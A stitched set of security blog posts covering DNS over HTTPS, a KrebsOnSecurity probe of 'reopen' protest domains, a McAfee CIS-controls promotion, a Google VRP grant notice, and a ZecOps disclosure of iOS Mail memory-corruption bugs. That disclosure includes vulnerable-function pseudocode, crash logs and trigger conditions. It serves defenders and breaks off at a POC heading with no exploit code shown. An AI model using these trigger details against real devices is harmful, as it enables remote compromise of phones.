In response to these concerns, DNS over HTTPS (DoH) offers a method for encrypting DNS requests. Designed by the Internet Engineering Task Force, it leverages HTTPS privacy standard to mask these requests from those who may seek to use the information improperly. The same encryption standards used by banks, credit monitoring services, and other sites dealing in sensitive information display to prove their legitimacy is also used with DoH.

It does this by effectively ‘wrapping’ DNS requests with the HTTPS encryption protocols to ensure the server you connect with is the server you intended to connect with and that no one is listening in those requests, because all the traffic is encrypted.

“It makes sure no one is messing with a user by changing the results of a request before it’s returned,” says Barnett.

In addition to improving privacy around device usage—remember any internet-connected device needs to “phone home” occasionally, therefore initiating a DNS request—DoH also addresses several DNS-enabled attack methods. This includes DNS spoofing, also called DNS hijacking, whereby cybercriminals redirect a DNS request to their own servers in order to spy on or alter communications. By encrypting this traffic, it essentially becomes worthless as a target.

So, while the domain name system has served the internet and its users well for decades, the time may have come for a change.

“The creators of DNS, in their wildest dreams, imagined the system may be able to accommodate up to 50 million domains. We’re at 330 million now. It’s amazing what they achieved,” says Barnett. “But DNS needs to evolve. It’s been a great tool, but it wasn’t designed with privacy or security as a priority. DoH represents the logical evolution of DNS.”

Toward A DoH-Enabled Future

Several major tech players, like Mozilla with its Firefox browser, have already made the leap to using DoH as its preferred method of resolving requests. Many companies, however, would prefer to retain control of DNS and are concerned about applications making independent rogue DNS requests. Losing this control can compromise security as it limits the ability of a business to filter and process these requests.

As application creators strive for better privacy for their users and business always look improve security, a balance must be found. By limiting whether applications can enable DoH, Webroot® DNS Protection has designed its agent to retain control of DNS requests, and while also running each request through Webroot’s threat intelligence platform, both privacy and security is improved.

It’s next release, expected in the coming months, will be fully compatible with the new DoH protocol in service to the security and privacy of its users.

The post DNS is on the Verge of a Major Overhaul appeared first on Webroot Blog.

Who’s Behind the “Reopen” Domain Surge?

The past few weeks have seen a large number of new domain registrations beginning with the word “reopen” and ending with U.S. city or state names. The largest number of them were created just hours after President Trump sent a series of all-caps tweets urging citizens to “liberate” themselves from new gun control measures and state leaders who’ve enacted strict social distancing restrictions in the face of the COVID-19 pandemic. Here’s a closer look at who and what appear to be behind these domains.

A series of inciteful tweets sent by President Trump on April 17, the same day dozens of state-themed “reopen” domains were registered — mostly by conservative groups and gun rights advocates.

KrebsOnSecurity began this research after reading a fascinating Reddit thread over the weekend on several “reopen” sites that seemed to be engaged in astroturfing, which involves masking the sponsors of a message or organization to make it appear as though it originates from and is supported by grassroots participants.

The Reddit discussion focused on a handful of new domains — including,, and — that appeared to be tied to various gun rights groups in those states. Their registrations have roughly coincided with contemporaneous demonstrations in Minnesota, California and Tennessee where people showed up to protest quarantine restrictions over the past few days.

A “reopen California” protest over the weekend in Huntington Beach, Calif. Image: Reddit.

Suspecting that these were but a subset of a larger corpus of similar domains registered for every state in the union, KrebsOnSecurity ran a domain search report at DomainTools [an advertiser on this site], requesting any and all domains registered in the past month that begin with “reopen” and end in “.com.”

That lookup returned approximately 150 domains; in addition to those named after the individual 50 states, some of the domains refer to large American cities or counties, and others to more general concepts, such as “” or “”

Many of the domains are still dormant, leading to parked pages and registration records obscured behind privacy protection services. But a review of other details about these domains suggests a majority of them are tied to various gun rights groups, state Republican Party organizations, and conservative think tanks, religious and advocacy groups.

For example, forwards to, but the site’s WHOIS registration records (obscured since the Reddit thread went viral) point to an individual living in Florida. That same Florida resident registered, a site that forwards to the Pennsylvania Firearms Association, and urges the state’s residents to contact their governor about easing the COVID-19 restrictions. is tied to a Facebook page called Pennsylvanians Against Excessive Quarantine, which sought to organize an “Operation Gridlock” protest at noon today in Pennsylvania among its 68,000 members.

Both the Minnesota and Pennsylvania gun advocacy sites include the same Google Analytics tracker in their source code: UA-60996284. A cursory Internet search on that code shows it also is present on and

More importantly, the same code shows up on a number of other anti-gun control sites registered by the Dorr Brothers, real-life brothers who have created nonprofits (in name only) across dozens of states that are so extreme in their stance they make the National Rifle Association look like a liberal group by comparison.

This 2019 article at quotes several 2nd Amendment advocates saying the Dorr brothers simply seek “to stir the pot and make as much animosity as they can, and then raise money off that animosity.” The site also is instructive here.

A number of other sites — such as — seem to exist merely to sell t-shirts, decals and yard signs with such slogans as “Know Your Rights,” “Live Free or Die,” and “Facts not Fear.” WHOIS records show the same Florida resident who registered this North Carolina site also registered one for New York — — just a few minutes later.

Merchandise available from

Some of the concept reopen domains — including (registered Apr. 15) and (Apr. 16) — trace back to FreedomWorks, a conservative group that the Associated Press says has been holding weekly virtual town halls with members of Congress, “igniting an activist base of thousands of supporters across the nation to back up the effort.” — which advocates for lifting social restrictions in Orange County, Calif. — links to a Facebook page for Orange County Republicans, and has been chronicling the street protests there. The messaging on — urging visitors to digitally sign a reopen petition to the state governor — is identical to the message on the Facebook page of the Horry County, SC Conservative Republicans. was registered on April 16 to In Pursuit of LLC, an Arlington, Va.-based conservative group with a number of former employees who currently work at the White House or in cabinet agencies. A 2016 story from USA Today says In Pursuit Of LLC is a for-profit communications agency launched by billionaire industrialist Charles Koch.

Many of the reopen sites that have redacted names and other information about their registrants nevertheless hold other clues, mainly based on precisely when they were registered. Each domain registration record includes a date and timestamp down to the second that the domain was registered. By grouping the timestamps for domains that have obfuscated registration details and comparing them to domains that do include ownership data, we can infer more information.

For example, more than 50 reopen domains were registered within an hour of each other on April 17 — between 3:25 p.m. ET and 4:43 ET. Most of these lack registration details, but a handful of them did (until the Reddit post went viral) include the registrant name Michael Murphy, the same name tied to the aforementioned Minnesota and Pennsylvania gun rights domains ( and that were registered within seconds of each other on April 8.

A large number of “reopen” domains were registered within the same one-hour period on April 17, and tie back to the same name used in the various reopen domains connected to gun rights groups. A link to the spreadsheet where this screen shot is drawn from is included below.

A Google spreadsheet documenting much of the domain information sourced in this story is available here.

No one responded to the email addresses and phone numbers tied to Mr. Murphy, who may or may not have been involved in this domain registration scheme. Those contact details suggest he runs a store in Florida that makes art out of reclaimed or discarded items.

Update, April 21, 6:40 a.m. ET: Mother Jones has published a compelling interview with Mr. Murphy, who says he registered thousands of dollars worth of “reopen” and “liberate” domains to keep them out of the hands of people trying to organize protests. KrebsOnSecurity has not be able to validate this report, but it’s a fascinating twist to this tale: How an ‘Old Hippie’ Got Accused of Astroturfing the Right-Wing Campaign to Reopen the Economy

Update, April 22, 1:52 p.m. ET: Mr. Murphy told he did not register or, contrary to data in the spreadsheet linked above. I looked up each of the records in that spreadsheet manually, but did have some help from another source in compiling and sorting the information. It is possible the registration data for those domains got transposed with and, which included Mr. Murphy’s information prior to being redacted by the domain registrar.

Original story:

As much as President Trump likes to refer to stories critical of him and his administration as “fake news,” this type of astroturfing is not only dangerous to public health, but it’s reminiscent of the playbook used by Russia to sow discord, create phony protest events, and spread disinformation across America in the lead-up to the 2016 election.

This entire astroturfing campaign also brings to mind a “local news” network called Local Government Information Services (LGIS), an organization founded in 2018 which operates a huge network of hundreds of sites that purport to be local news sites in various states. However, most of the content is generated by automated computer algorithms that consume data from reports released by U.S. executive branch federal agencies.

The relatively scarce actual bylined content on these LGIS sites is authored by freelancers who are in most cases nowhere near the localities they cover. Other content not drawn from government reports often repurpose press releases from conservative Web sites, including,, and The Heritage Foundation. For more on LGIS, check out the 2018 coverage from The Chicago Tribune and the Columbia Journalism Review.

Establishing Security Maturity Through CIS Cyber Defense Framework

Introduction – Choosing the Right Security Controls Framework

The cyber threat landscape is evolving at an astronomical rate; we are living in the age where the four key pillars of cybersecurity – Confidentiality, Integrity, Availability and Assurance of Information systems are no longer considered a nice to have but are a metric for business resilience and operational existence of businesses across the globe.

In this blog we set out to see how choosing the correct security controls framework can go a long way in establishing a secure foundation, which then allows Enterprise security designers/decision makers to make more informed solution choices while selecting the controls and vendor architectures.

Organizations are increasingly finding themselves caught in the “security war of more” where Governance, Risk and Compliance regimes, compounded by vendor solution fragmentation, have resulted in tick-box security. At times this has left organizations with either overlapping security capabilities or completely missing critical security controls.  Adversaries continue to take advantage of this industry predicament as depicted by the 4 billion records lost through data breaches and malware attacks in 2019 (Source: Verizon).

In order to win this battle, a structured and homogenous approach must be constructed across the industry. This is where security frameworks come into the picture. Security control frameworks plays a pivotal role that can sit as a foundation across multiple law and compliance regimes to provide key capabilities for an organization. The CIS (Center for Internet Security) CSC (Critical Security Control) framework provides just that — the fundamental underpinnings of a strong organizational cyber defense. This blog is a continuation of the CIS whitepaper published here where we introduce CIS Controls and McAfee product capabilities. CIS CSC provides a path for an organization to get started on its cyber defense program; it provides an option for organizations who do not know where to get started and organizations at mid-maturity level to augment their capabilities to “Optimize and Execute” on their Cybersecurity needs. CIS, provides a list of Critical Security Controls that have been cherry picked to be most effective against most common attacks. It offers layered protection via a defense in depth approach to cybersecurity and has been developed using firsthand experiences of cyber defenders across various industry verticals such as retail, manufacturing, healthcare, government, etc. The CIS CSC controls are based on a risk metric; each control is weighted based on the likelihood and impact of an incident posing a significant threat to an Enterprise. It draws from the foundational elements of risk management and continuous protection by not only protecting against the initial compromise but also looking into detecting and protecting against existing adversary activity within an environment. This offers flexibility for an organization to make a start on CIS CSC implementation irrespective of its security lifecycle.

Architecting Enterprise Cyber Defense with CIS

This section highlights how the CIS controls secure an Enterprise using its layered defense in depth approach moving from the basic controls, which are mostly focused on endpoints, to the Enterprise boundary and then combining it through the People, Process and Technology triad at the organizational level.

The full list of CIS CSC controls and detailed mapping of our products can be found here. A similar document showing the usage of McAfee products to support the NIST 800-53 security controls is available here.

CIS Implementation Groups and Organizational Maturity

The CIS control framework offers mature organizations the opportunity to further enhance and optimize their controls by implementing the CIS sub-controls. The full list of 148 sub-controls can be found here. The sub-controls are grouped into 3 implementation groups. The implementation groups allow organizations to tailor the framework based on self-evaluation of their security maturity and the resources available to them. The CIS framework breaks the sub-controls into 3 groups:

Figure: CIS Implementation Groups – Source CIS

Each group builds on the previous group’s capabilities, e.g. IG2 builds upon the controls in IG1. The mapping of the controls to the needs and wants can be loosely tied together as follows:

Implementation Group 1: This group is mainly aimed at small businesses using commercial off the shelf software, data sensitivity requirements are usually very low.

Implementation Group 2: This group is aimed at the Enterprise storing sensitive business information and having reasonable cybersecurity resources for implementation of the controls.

Implementation Group 3: This group is mainly aimed as a defense against sophisticated adversaries such as Nation State actors utilizing Zero-day vulnerabilities.

McAfee’s Solution Architecture Aligned with CIS CSC Principles

The CSC controls leverage 6 key principles and McAfee solutions & services address these principles effectively

  1. Offense Informs Defense – It considers real world adversary Tactics, Techniques and Procedures (TTP’s) such as the ones used in the MITRE ATT&CK Matrix and establishes controls that have successfully defended against such adversary TTP’s. Thus, each control offers tested capabilities that can be relied upon.

McAfee products such as MVISION EDR, ESM and common threat intelligence services such as GTI are continuously adapting to the latest adversarial tactics to detect and protect against both known and unknown threats and implement the MITRE ATT&CK matrix to analyze and apply context to detected IOC’s. MVISION Insights bring the Enterprise threat landscape into context by providing industry specific intelligence on existing or developing attack campaigns.

  1. Prioritization – Organizations are grappling with a wide variety of attack surfaces as well as challenges around resources, so it is important for any Enterprise to establish priority on its defensive efforts, aka – “We need to contain the fire which has the potential to burn down the house first before saving the garden”

McAfee solution architect teams have access to a wide variety of tools including CIS control assessment capabilities. This allows us to explore customer challenges within their Cloud, Endpoint or Enterprise perimeter and help identify gaps and risks in customer environments. The McAfee Professional Services team can deliver Security Operations (SecOps) maturity assessments and assist customers to develop, fine tune and build their SecOps capabilities. McAfee products also have built in assessment capabilities mapping your Enterprise security maturity to similar industry peers, i.e. the Cloud Security Advisor (CSA) within MVISION Cloud. The CSA allows you to map your cloud security maturity journey with guided recommendations.

  1. Metrics – Any security effort needs to provide clear quantitative and qualitative benefits that allows for Business Owners to understand a business’s cyber risk profile and establishing clear needs and wants. The metrics establish linguistic homogeneity across Business Owners, System Owners and external entities. By scoring the missing and existing controls and processes within an organization a clear security baseline score can be calculated which, in turn, can establish the security maturity of the organization.

Several McAfee products allow customers to establish a consolidated view of their key security metrics, e.g.:

  • McAfee ePO – Provides several security dashboards that collect metrics from various ePO extensions. ePO Protection Workspace, for example, gives a single pane of glass view across your device to cloud risk and threat metrics. Various built in dashboards further leverage ePO extensions such as Policy Auditor and Application Control for establishing metrics around your software inventory and endpoint system integrity, thus providing metrics around CIS Controls 2 and 5.
  • McAfee ESM – Provides content packs that open normalized views of key metrics such as network or endpoint threat events and offers a way to easily visualize risk metrics associated with these assets and closely aligns to metric requirements around CIS 6, 16 and 19.
  • McAfee MVISION Cloud – MVISION Cloud provides key metrics around risks across your cloud SaaS, PaaS, IaaS, CaaS , FaaS as well as risks originating from unsanctioned cloud services, thus closely aligning with metric requirements for CIS 1,2,16 and 18 (Refer to CIS and Cloud Infrastructure for further details)
  1. Continuous Diagnostics and Mitigation – Cyber threats are evolving continuously so Cybersecurity should be a continuous effort. Any implementation of security controls requires continuous validation in the context of the business processes, tools and people involved within the organization and CIS controls introduce mechanisms for effective continuous monitoring and risk reduction.

McAfee ePO, ESM, NSP and MVISION platforms, along with various SIA partner solutions, provide continuous monitoring, diagnostics and response capabilities for cyberthreats. For example, our integrated reference architecture for Shadow IT protection uses MVISION Cloud’s shadow IT cloud risk registry to discover potentially risky Enterprise Cloud services and then utilizes service groups to update network defense such as the McAfee Web Gateway, or other 3rd party web filtering solutions, to block and protect users against those services. Similarly, we have integrated reference architectures that provide continuous risk detection and mitigation for Industrial Control Systems (ICS), Phishing , Threat Intelligence based containment and many more, details of which are available through the Cyber Defense architecture workshops.

  1. Automation – Security automation is key in achieving scalability around threat detection, protection and response. Rapidly evolving IT environments such as Cloud and BYOD access require automated monitoring and continuous security event correlation and behavior analysis.

 McAfee ESM, MVISION EDR, ATD and TIE, along with a combination of integrations with Threat intelligence platforms such as MISP, ThreatQ and Security orchestration tools such as Swimlane, provide an architecture that can provide adaptive security to a constantly evolving threat landscape.

  1. Continuous Risk Mitigation – The CIS controls can provide the pillars for supporting many of the well-known risk management frameworks such as the NIST RMF as documented in SP800-37. The example below outlines CIS controls as a foundation for NIST RMF.

Figure: NIST RMF as supported by CIS CSC

CIS Controls Within Cloud Infrastructure

This section highlights the mapping and use cases for CIS within the public cloud infrastructure. The CIS controls in context of public, private and hybrid cloud infrastructures are largely applicable; the challenges appear around the shared responsibility model within the public cloud infrastructure, where consumers must relinquish control over the underlying infrastructure and rely upon the Cloud Service Provider (CSP) for securing the infrastructure.

The following table maps the CIS controls against their applicability across the 4 key Cloud Infrastructure categories of IaaS, SaaS, PaaS and FaaS.

Table 1: CIS Controls Coverage across Cloud Infrastructure

CIS and System Hardening

CIS benchmarks provide guidance on hardening of assets from device to the Cloud across over 140 technologies. These best practice guidelines allow organizations to configure these devices in the most secure configuration possible. The benchmarks also provide several pre-configured tools for baseline configuration analysis and continuous monitoring of the baselines to track any deviations. The CIS CAT tool can be used to perform post implementation analysis for further confirmation and measurements against an organization’s implementation of the CIS controls.

More details about the benchmarks can be found here:

McAfee solutions such as ePO, application control and MVISION Cloud provide features that leverage the CIS benchmarks to evaluate the security posture and provide a measurable metric for a customer.


In summary, the CIS controls provide a comprehensive framework for adaptable security based on core security concepts of the following: –

Figure 3: CIS Continues Risk Mitigation Cycle

thus, delivering true security outcomes by focusing on business priorities, organizational resources and providing metrics for measurable risk reduction. By implementing the CIS controls Enterprises can easily align to other frameworks such as GDPR, CCPA, HIPAA, PCI-DSS, etc.

McAfee is part of the CIS alliance which allows us to use its frameworks within our products as well as offer our solutions through the CIS Cybermarket


  1. – CIS Controls
  2. – CIS Cloud Companion Guide.
  3. NIST RMF 800-37
  4. – Verizon Data Breach Investigation Reports

The post Establishing Security Maturity Through CIS Cyber Defense Framework appeared first on McAfee Blogs.

Research Grants to support Google VRP Bug Hunters during COVID-19

In 2015, we launched our Vulnerability Research Grant program, which allows us to recognize the time and efforts of security researchers, including the situations where they don't find any vulnerabilities. To support our community of security researchers and to help protect our users around the world during COVID-19, we are announcing a temporary expansion of our Vulnerability Research Grant efforts.

In light of new challenges caused by the coronavirus outbreak, we are expanding this initiative by  creating a COVID-19 grant fund. As of today, every Google VRP Bug Hunter who submitted at least two remunerated reports from 2018 through April 2020 will be eligible for a $1,337 research grant. We are dedicating these grants to support our researchers during this time. We are committed to protecting our users and we want to encourage the research community to help us identify threats and to prevent potential vulnerabilities in our products.

We understand the individual challenges COVID-19 has placed on the research community are different for everyone and we hope that these grants will allow us to support our Bug Hunters during these uncertain times. Even though our grants are intended to recognize the efforts of our frequent researchers regardless of their results, as always, bugs found during the grant are eligible for regular rewards per the Vulnerability Reward Program (VRP) rules. We are aware that some of our partners might not be interested in monetary grants. In such cases, we will offer the option to donate the grant to an established COVID-19 related charity and within our discretion, will monetarily match these charitable donations.

For those of you who recently joined us or are planning to start, it’s never too late. We are committed to continue the Vulnerability Research Grant program throughout 2020, so stay tuned for future announcements and follow us on @GoogleVRP!

You’ve Got (0-click) Mail!

You’ve Got (0-click) Mail!


Impact & Key Details (TL;DR) :

  • The vulnerability allows remote code execution capabilities and enables an attacker to remotely infect a device by sending emails that consume significant amount of memory
  • The vulnerability does not necessarily require a large email – a regular email which is able to consume enough RAM would be sufficient. There are many ways to achieve such resource exhaustion including RTF, multi-part, and other methods
  • Both vulnerabilities were triggered in-the-wild
  • The vulnerability can be triggered before the entire email is downloaded, hence the email content won’t necessarily remain on the device
  • We are not dismissing the possibility that attackers may have deleted remaining emails following a successful attack
  • Vulnerability trigger on iOS 13: Unassisted (/zero-click) attacks on iOS 13 when Mail application is opened in the background
  • Vulnerability trigger on iOS 12: The attack requires a click on the email. The attack will be triggered before rendering the content. The user won’t notice anything anomalous in the email itself
  • Unassisted attacks on iOS 12 can be triggered (aka zero click) if the attacker controls the mail server
  • The vulnerabilities exist at least since iOS 6 – (issue date: September 2012) – when iPhone 5 was released
  • The earliest triggers we have observed in the wild were on iOS 11.2.2 in January 2018
  • FAQ

This post is the first part of a series – See post number 2

the mail-demon vulnerability
were you targeted by this vulnerability?

Multiple Vulnerabilities in MobileMail/Maild


Following a routine iOS Digital Forensics and Incident Response (DFIR) investigation, ZecOps found a number of suspicious events that affecting the default Mail application on iOS dating as far back as Jan 2018. ZecOps analyzed these events and discovered an exploitable vulnerability affecting Apple’s iPhones and iPads. ZecOps detected multiple triggers in the wild to this vulnerability on enterprise users, VIPs, and MSSPs, over a prolonged period of time.

The attack’s scope consists of sending a specially crafted email to a victim’s mailbox enabling it to trigger the vulnerability in the context of iOS MobileMail application on iOS 12 or maild on iOS 13. Based on ZecOps Research and Threat Intelligence, we surmise with high confidence that these vulnerabilities – in particular, the remote heap overflow – are widely exploited in the wild in targeted attacks by an advanced threat operator(s).

The suspected targets included:

  • Individuals from a Fortune 500 organization in North America
  • An executive from a carrier in Japan 
  • A VIP from Germany
  • MSSPs from Saudi Arabia and Israel
  • A Journalist in Europe
  • Suspected: An executive from a Swiss enterprise

Few of the suspicious events even included strings commonly used by hackers (e.g. 414141…4141) – see FAQ. After verifying that it wasn’t a red-team exercise, we validated that these strings were provided by the email-sender. Noteworthy, although the data confirms that the exploit emails were received and processed by victims’ iOS devices, corresponding emails that should have been received and stored on the mail-server were missing. Therefore, we infer that these emails may have been deleted intentionally as part of attack’s operational security cleanup measures.

We believe that these attacks are correlative with at least one nation-state threat operator or a nation-state that purchased the exploit from a third-party researcher in a Proof of Concept (POC) grade and used ‘as-is’ or with minor modifications (hence the 4141..41 strings).

While ZecOps refrain from attributing these attacks to a specific threat actor, we are aware that at least one ‘hackers-for-hire’ organization is selling exploits using vulnerabilities that leverage email addresses as a main identifier.

We advise to update as soon as an iOS update is available.

Exploitation timeline

We are aware of multiple triggers in the wild that happened starting from Jan 2018, on iOS 11.2.2. It is likely that the same threat operators are actively abusing these vulnerabilities presently. It is possible that the attacker(s) were using this vulnerability even earlier. We have seen similarities between some of the suspected victims during triggers to these vulnerabilities.

Affected versions:

  • All tested iOS versions are vulnerable including iOS 13.4.1. 
  • Based on our data, these bugs were actively triggered on iOS 11.2.2 and potentially earlier.
  • iOS 6 and above are vulnerable. iOS 6 was released in 2012. Versions prior to iOS 6 might be vulnerable too but we haven’t checked earlier versions. At the time of iOS 6 release, iPhone 5 was in the market.

ZecOps Customers & Partners

ZecOps Gluon iOS DFIR customers can detect attacks leveraging MobileMail/maild vulnerabilities.

Thank you

Before we dive deeper, we would like to thank Apple’s product security and  the engineering team that delivered a beta patch to block these vulnerabilities from further abuse once deployed to GA.

Vulnerability Details

ZecOps found that the implementation of MFMutableData in the MIME library lacks error checking for system call ftruncate() which leads to the Out-Of-Bounds write. We also found a way to trigger the OOB-Write without waiting for the failure of the system call ftruncate. In addition, we found a heap-overflow that can be triggered remotely.

We are aware of remote triggers of both vulnerabilities in the wild. 

Both the OOB Write bug, and the Heap-Overflow bug, occurred due to the same problem: not handling the return value of the system calls correctly.

The remote bug can be triggered while processing the downloaded email, in such scenario, the email won’t get fully downloaded to the device as a result.

Affected Library: /System/Library/PrivateFrameworks/MIME.framework/MIME

Vulnerable function: -[MFMutableData appendBytes:length:]

Abnormal behavior once the vulnerabilities are exploited

Besides a temporary slowdown of mobile mail application, users should not observe any other anomalous behavior. Following an exploit attempt (both successful / unsuccessful) on iOS 12 – users may notice a sudden crash of the Mail application.

On iOS13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried afterwards and deletes the email. 

In failed attacks, the emails that would be sent by the attacker would show the message: “This message has no content.”.. As seen in the following picture below:

Crash Forensics Analysis

Part of the a crash (out of multiple crashes) experienced by the user, is as follows.

The crashed instruction was stnp x8, x9, [x3], meaning that the value of x8 and x9 has been written into x3 and crashed due to accessing an invalid address 0x000000013aa1c000 which was stored in x3.

Thread 3 Crashed:
0   libsystem_platform.dylib      	0x000000019e671d88 _platform_memmove +88
       0x19e671d84 0x00008da8                
       0x19e671d88         stnp x8, x9, [x3]              
       0x19e671d8c         stnp x10, x11, [x3, #16]       
       0x19e671d90         add x3, x3, 0x20               
       0x19e671d94         ldnp x8, x9, [x1]              
1   MIME                          	0x00000001b034c4d8 -[MFMutableData appendBytes:length:] + 356 
2   Message                       	0x00000001b0b379c8 -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] + 808
x0: 0x000000013aa1b05a  x5: 0x0000000000000006
x1: 0x0000000102f0cfc6  x6: 0x0000000000000000
x2: 0x0000000000004a01  x7: 0x0000000000000000
x3: 0x000000013aa1c000  x8: 0x3661614331732f0a
x4: 0x000000000000004b  x9: 0x48575239734c314a

In order to find out why the process crashed, we need to take a look at the implementation of MFMutableData.

The below call tree is taken from the crash log experienced only by a selected number of  devices.

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
+--  -[MFMutableData appendData:]
   +--  -[MFMutableData appendBytes:length:]
       +-- memmove()

By analyzing the MIME library, the pseudo code of -[MFMutableData appendBytes:length:] as follows:

-(void)appendBytes:(const void*)bytes length:(uint64_t)len{
    uint64_t new_length = old_length + len;
    [self setLength:new_length];
    if (!self->flush){
        self->flush = true;
    memmove(dest, bytes, len);

The following call stack was executed before the crash happened:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
+--  -[MFMutableData appendData:]
   +--  -[MFMutableData appendBytes:length:]
       +-- -[MFMutableData setLength:]
          +-- -[MFMutableData _flushToDisk:capacity:]
             +-- ftruncate()

A file is used to store the actual data if the data size reaches the threshold, when the data changes, the content and the size of the mapped file should be changed accordingly. The system-call ftruncate() is called inside -[MFMutableData _flushToDisk:capacity:] to adjust the size of the mapped file.

Following is the pseudo code of -[MFMutableData _flushToDisk:capacity:]

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity;{
    boolean_t flush;
    if (self->path){
        boolean_t flush = self->flush; //<-line [a]
        flush = true;
    if(flush){ //<-line [b]
        ftruncate(self->path, capacity);
        self->flush = false;

The man page of ftruncate specifies:

ftruncate() and truncate() cause the file named by path, or referenced by fildes, to be truncated
 (or extended) to length bytes in size. If the file size exceeds length, any extra data is discarded. 
If the file size is smaller than length, the file is extended and filled with zeros to the indicated 
length.  The ftruncate() form requires the file to be open for writing.
    A value of 0 is returned if the call succeeds.  If the call fails a -1 is returned, and the global 
    variable errno specifies the error.

According to the man page: “If the call fails a -1 is returned, and the global variable errno specifies the error.” which means under certain conditions, this system call would fail to truncate the file and return an error code.

However, upon failure of the ftruncate system call , _flushToDisk continues anyway, which means the mapped file size is not extended and the execution finally reaches the memmove() in the appendBytes() function, causing the mmap file an out-of-bound (OOB) write.

Finding another trigger

We know that the crash was due to a failure ftruncate() system call, does it mean we can’t do anything but to wait for the system call to fail?

Let’s take another look at the -[MFMutableData _flushToDisk:capacity:] function.

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity;{
    boolean_t flush;
    if (self->path){
        boolean_t flush = self->flush; //<-line [a]
        flush = true;
    if(flush){ //<-line [b]
        ftruncate(self->path, capacity);
        self->flush = false;

As you can see in line [b], it checks whether the flush flag is true before calling ftruncate(). This means if we can set the flush flag to false at line [a], the ftruncate() won’t be executed at all.

If someone calls -[MFMutableData setLength:](set flush to  0), before calling -[MFMutableData appendData:], ftruncate() won’t be executed due to flush==0) and  there will be a similar result.

The following backtrace is a demonstration of a local POC. Combining this OOB Write with an additional vulnerability and/or methods to control the memory layout, this vulnerability could be triggered remotely – for example by controlling the selectors (as we have observed in other DFIR events as well as in Google Project Zero blog post).

Thread 0 Crashed:
0   libsystem_platform.dylib      	0x00000001cc442d98 _platform_memmove  + 88
       0x1cc442d8c         stnp x14, x15, [x0, #16]       
       0x1cc442d90         subs x2, x2, 0x40              
       0x1cc442d94 0x00008db8    // 0x00000001cc44bf30 
       0x1cc442d98         stnp x8, x9, [x3]              
       0x1cc442d9c         stnp x10, x11, [x3, #16]       
       0x1cc442da0         add x3, x3, 0x20               
       0x1cc442da4         ldnp x8, x9, [x1]              

1   MIME                          	0x00000001ddbf0518 -[MFMutableData appendBytes:length:]  + 352
       0x1ddbf050c         mov x1, x20                    
       0x1ddbf0510         mov x2, x19                    
       0x1ddbf0514         bl 0x000498f4    // 0x00000001ddc39e08 
       0x1ddbf0518         ldp x29, x30, [sp, #80]        
       0x1ddbf051c         ldp x20, x19, [sp, #64]        
       0x1ddbf0520         ldp x22, x21, [sp, #48]        
       0x1ddbf0524         ldp x24, x23, [sp, #32]        

Although this is indeed a vulnerability that should be patched, we suspect that it was triggered by accident while the attackers were trying to exploit the following vulnerability.

2nd Vulnerability: Remote Heap Overflow in MFMutable

We continued our investigation to the remotely triggered events that were suspicious and determined that there is another vulnerability in the same area

The backtrace can be seen as following:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
+--  -[MFMutableData appendData:]
   +--  -[MFMutableData appendBytes:length:]
       +-- -[MFMutableData _mapMutableData]

While analyzing the code flow, we determined the following:

  • The function [MFDAMessageContentConsumer consumeData:length:format:mailMessage:] gets called when downloading an email in raw MIME form, and also will get called multiple times until the email is downloaded in Exchange mode. It will create a new NSMutableData object, and call appendData: for any new streaming data that belongs to the same email/MIME message. For other protocols like IMAP it uses -[MFConnection readLineIntoData:] instead but the logic and vulnerability are the same.
  • NSMutableData sets a threshold of 0x200000 bytes, if the data is bigger than 0x200000 bytes, it will write the data into a file, and then use the mmap systemcall to map the file into the device memory. The threshold size of 0x200000 can be easily excessed, so every time new data needs to append, the file will be re-mmap’ed, and the file size as well as the mmap size getting bigger and bigger.
  • Remapping is done inside -[MFMutableData _mapMutableData:], the vulnerability is inside this function.

Pseudocode of the vulnerable function as below:

-[MFMutableData _mapMutableData:] calls function MFMutableData__mapMutableData___block_invoke when the mmap system call fails

-[MFMutableData _mapMutableData:]
  result = mmap(0LL, v8, v9, 2, v6, 0LL);
  if (result == -1){
      result = (void *)MFMutableData__mapMutableData___block_invoke(&v21);

The pseudo code of MFMutableData__mapMutableData___block_invoke is as follows, it allocates a size 8 heap memory then replaces the data->bytes pointer with the allocated memory.

void MFMutableData__mapMutableData___block_invoke(__int64 data)
  __int64 result; // x0

  data->vm = 0;    
  data->length = 0;
  data->capacity = 8; // Reset MFMutableData capacity to 8
  result = calloc(data->capacity, 1); // Allocate a new piece of memory, size of 8
  data->bytes = result; // replace the mapping memory pointer, which overwrites the -1 in case of mmap failure.
  return result;

After the execution of -[MFMutableData _mapMutableData:], the process continues execution of -[MFMutableData appendBytes:length:], causing a heap overflow when copying data to the allocated memory.

-[MFMutableData appendBytes:length:] 
  int length = [self length];
  bytes = self->bytes;
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  copy_dst = bytes + length;
  platform_memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap

append_length is the length of a chunk of data from the streaming. Since MALLOC_NANO is a very predictable memory region, it is possible to exploit this vulnerability.

An attacker doesn’t need to drain every last bit of the memory to cause mmap to fail, as mmap requires a continuous memory region.


According to the man page of mmap, the mmap would fail when MAP_ANON was specified and insufficient memory was available.

The goal is to cause mmap to fail, ideally, a big enough email is going to make it happen inevitably. However, we believe that the vulnerabilities can be triggered in using other tricks that can exhaust the resources. Such tricks can be achieved through multi-part, RTF, and other formats – more on that later.

Another important factor that can affect exploitability, is the hardware specs:

  • iPhone 6 has 1GB
  • iPhone 7 has 2GB
  • iPhone X has 3GB

Older devices have smaller physical RAM, and smaller virtual memory space, hence it is not necessary to drain every last bit of RAM in order to trigger this bug, mmap will fail when it cannot find a continuous memory of given size in the available virtual memory space.

We have determined that MacOS is not vulnerable to both vulnerabilities.

In iOS 12, it is easier to trigger the vulnerability because the data streaming is done within the same process, as the default mail application (MobileMail), it deals with much more resources, which eats up allocation of virtual memory space, especially the UI rendering, whereas in iOS 13, MobileMail pass data streaming to a background process namely maild. It concentrates its resources in parsing the e-mails, which reduces the risk of virtual memory space accidentally running out.

Remote Reproduction / POC

